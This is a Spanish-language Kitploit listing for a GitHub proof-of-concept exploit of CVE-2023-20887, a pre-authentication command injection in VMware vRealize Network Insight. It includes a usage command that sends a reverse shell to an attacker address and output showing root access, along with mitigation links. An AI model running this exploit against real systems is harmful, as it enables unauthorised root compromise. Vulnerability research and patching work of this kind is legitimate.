Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-20887 — VMware vRealize Network Insight RCE preautenticado (CVE-2023-20887) | Kitploit
Herramientas/GitHubGitHub/malwareman007/cve-2023-20887
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed Teaming
GitHubmalwareman007/cve-2023-20887

CVE-2023-20887

VMware vRealize Network Insight RCE preautenticado (CVE-2023-20887)

Ver Repositorio
81hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

CVE-2023-20887

POC para CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight) RCE no autenticado

Análisis Técnico

Un análisis de la causa raíz de la vulnerabilidad se puede encontrar en mi blog: https://kushagraojha.medium.com/vmware-vrealize-network-insight-cve-2023-20887-193f3c3d30a0

Resumen

VMWare Aria Operations for Networks (vRealize Network Insight) es vulnerable a la inyección de comandos cuando acepta entrada del usuario a través de la interfaz Apache Thrift RPC. Esta vulnerabilidad permite a un atacante remoto no autenticado ejecutar comandos arbitrarios en el sistema operativo subyacente como usuario root. La interfaz RPC está protegida por un proxy inverso que puede omitirse. VMware ha evaluado la severidad de este problema dentro del rango de severidad Crítica, con una puntuación base CVSSv3 máxima de 9.8. Un actor malicioso puede obtener ejecución remota de código en el contexto de 'root' en el appliance. Las versiones de VMWare 6.x son vulnerables.

Uso

root@kitploit:~
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release

Mitigaciones

Actualice a la última versión o mitigue el problema siguiendo las instrucciones del Progress Advisory

  • https://www.vmware.com/security/advisories/VMSA-2023-0012.html

Descargo de responsabilidad

Este software ha sido creado puramente con fines de investigación académica y para el desarrollo de técnicas defensivas efectivas, y no está destinado a ser utilizado para atacar sistemas excepto cuando se cuente con autorización explícita. Los mantenedores del proyecto no son responsables del mal uso del software. Úselo con responsabilidad.

Descargar herramienta